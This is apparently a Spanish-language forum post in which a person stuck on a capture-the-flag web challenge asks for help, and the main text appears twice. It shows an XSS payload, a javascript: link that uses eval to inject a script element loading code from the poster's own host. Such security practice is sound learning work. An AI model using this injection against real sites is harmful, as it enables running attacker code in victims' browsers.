Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.
El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.
El javascript es el siguiente
<a href="javascript:openNewWindow('hello.html');">Rompeme</a>
He intentado cambiar el script para intentar sacar un XSS de esta manera
<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>
Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.
¿Alguien podria darme una mano?
Gracias
Saludos!!
El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.
El javascript es el siguiente
<a href="javascript:openNewWindow('hello.html');">Rompeme</a>
He intentado cambiar el script para intentar sacar un XSS de esta manera
<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>
Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.
¿Alguien podria darme una mano?
Gracias
Saludos!!